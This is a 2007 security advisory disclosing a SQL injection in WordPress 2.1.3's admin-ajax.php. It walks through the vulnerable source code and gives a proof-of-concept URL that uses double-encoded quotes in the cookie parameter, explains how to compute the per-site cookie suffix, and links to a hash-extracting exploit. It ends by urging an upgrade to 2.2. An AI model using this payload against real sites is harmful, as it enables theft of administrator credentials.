Author: Janek Vind “waraxe”
Date: 21. May 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-50.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable: WordPress 2.1.3
Patched: WordPress 2.2
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. critical sql injection in “admin-ajax.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let’s have look @ source code of “wp-admin/admin-ajax.php” ~ line 6:
—————————————-
define(’DOING_AJAX’, true);
check_ajax_referer();
if ( !is_user_logged_in() )
die(’-1′);
——————[/source code]———————-
Now let’s take a peek at “check_ajax_referer()”
—————————————-
function check_ajax_referer() {
$cookie = explode(’; ‘, urldecode(empty($_POST[’cookie’]) ?
$_GET[’cookie’] : $_POST[’cookie’])); // AJAX scripts must pass
cookie=document.cookie
foreach ( $cookie as $tasty ) {
if ( false !== strpos($tasty, USER_COOKIE) )
$user = substr(strstr($tasty, ‘=’), 1);
if ( false !== strpos($tasty, PASS_COOKIE) )
$pass = substr(strstr($tasty, ‘=’), 1);
}
if ( !wp_login( $user, $pass, true ) )
die(’-1′);
——————[/source code]———————-
We can see “urldecode()” in use …
So by using “%2527″ we can deliver single quotes to “wp_login()”,
effectively bypassing php’s “magic_quotes” feature!
Hmm, let’s proceed further:
—————————————-
function wp_login($username, $password, $already_md5 = false) {
global $wpdb, $error;
…
$login = get_userdatabylogin($username);
——————[/source code]———————-
And finally:
—————————————-
function get_userdatabylogin($user_login) {
global $wpdb;
…
if ( !$user = $wpdb->get_row(”SELECT * FROM $wpdb->users
WHERE user_login = ‘$user_login’”) )
return false;
——————[/source code]———————-
So really there seems to be exist sql injection possibility.
Now it’s time for some proof-of-concept fun 
——————[PoC test]———————–
http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php?
cookie=wordpressuser_5a136e6377f39b00c76957953df945db%253dx%2527gotcha
;+wordpresspass_5a136e6377f39b00c76957953df945db%253dx
——————[/PoC test]———————-
… and if WordPress sql error feedback is enabled, then we can see
nice error message:
WordPress database error: [You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for
the right syntax to use near ‘gotcha” at line 1]
SELECT * FROM wp_users WHERE user_login = ‘x’gotcha’
Yeah, it works!! But before testing that PoC cookie suffix must be changed
to currently valid. Here is how it goes:
Example target is: http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php
Base url for WordPress installation is: http://localhost/wordpress.2.1.3
And suffix is:
md5(’http://localhost/wordpress.2.1.3′) = ‘5a136e6377f39b00c76957953df945db’
And final variable names:
wordpressuser_5a136e6377f39b00c76957953df945db
wordpresspass_5a136e6377f39b00c76957953df945db
One more time: for every target must be calculated specific suffix!
OK, now about exploiting …
It seems that blind fishing is only method for this security hole.
There is exploit, I have written in php, which will retrieve from database
WordPress admin password md5 hash within few minutes.
Get it from here:
http://www.waraxe.us/ftopict-1776.html
//—–> See ya soon and have a nice day 
<—–//
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WordPress newest version 2.2 is immune against this sql injection.
So –> http://wordpress.org/download/ <– update it NOW!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips, Sm0ke, Chb
and all other people who know me!
Special greets goes to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind “waraxe”
Homepage: http://www.waraxe.us/
Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Axing url for easy use – http://urlaxe.com/
All about sql injections – http://sqlaxe.com/
———————————- [ EOF ] ————————————
-== schAtzY inSidE ==- 
Leave a comment